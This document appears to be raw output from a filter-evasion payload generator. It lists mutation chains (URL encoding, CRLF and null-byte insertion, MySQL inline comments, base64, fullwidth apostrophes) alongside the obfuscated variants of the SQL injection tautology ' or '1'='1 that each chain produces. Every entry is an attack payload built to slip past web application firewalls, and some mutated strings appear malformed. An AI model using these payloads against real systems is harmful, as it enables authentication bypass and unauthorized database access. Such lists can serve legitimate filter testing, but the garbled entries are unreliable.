Mutation algoritm:change_first_char_to_url space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!%480*/%/*!%507*/%/*!%48d*/%/*!%48aor*/%/*!%48d*/%/*!%48a*/\/*!*/%/*!%480*/%/*!%5071*/\/*!*/%/*!%480*/%/*!%507*/=/*!*/\/*!*/%/*!%480*/%/*!%5071*/%/*!%480*/
Mutation algoritm:change_first_char_to_url space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!%480%%507%%48d%%48aor%%48d%%48a\%%480%%5071\%%480%%507=\%%480%%5071%%480*/
Mutation algoritm:change_first_char_to_url space20d0a appendnullbyte apostrophenullencode 
Result: \%%480%%507%%48d%%48aor%%48d%%48a\%%480%%5071\%%480%%507=\%%480%%5071%%480
Mutation algoritm:change_first_char_to_url 
Result: \' %111r \'%49\'=\'%49
Mutation algoritm:caseinsensitive space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aOr*/%/*!0d*/%/*!0a*/\/*!*/%/*!00*/%/*!271*/\/*!*/%/*!00*/%/*!27*/=/*!*/\/*!*/%/*!00*/%/*!271*/%/*!00*/
Mutation algoritm:caseinsensitive space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!00%27%0d%0aOr%0d%0a\%00%271\%00%27=\%00%271%00*/
Mutation algoritm:caseinsensitive space20d0a appendnullbyte apostrophenullencode 
Result: \%00%27%0d%0aOr%0d%0a\%00%271\%00%27=\%00%271%00
Mutation algoritm:caseinsensitive 
Result: \' Or \'1\'=\'1
Mutation algoritm:bypass_SQL_Injection_Normalization 
Result: ["\\'+or+\\'1\\'=\\'1", "\\'+or+\\'1\\'=\\'1"]
Mutation algoritm:bypass_SQL_Injection_Normalization 
Result: ["\\'+or+\\'1\\'=\\'1", "\\'+or+\\'1\\'=\\'1"]
Mutation algoritm:base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: LyohKi9cLyohKi8lLyohMDAqLyUvKiEyNyovJS8qITBkKi8lLyohMGFvciovJS8qITBkKi8lLyohMGEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovXC8qISovJS8qITAwKi8lLyohMjcqLz0vKiEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovJS8qITAwKi8=
Mutation algoritm:base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: XCUvKiEwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAwKi8=
Mutation algoritm:base64encode space20d0a appendnullbyte apostrophenullencode 
Result: XCUwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAw
Mutation algoritm:base64encode 
Result: XCcgb3IgXCcxXCc9XCcx
Mutation algoritm:apostrophemask 
Result: \%EF%BC%87 or \%EF%BC%871\%EF%BC%87=\%EF%BC%871
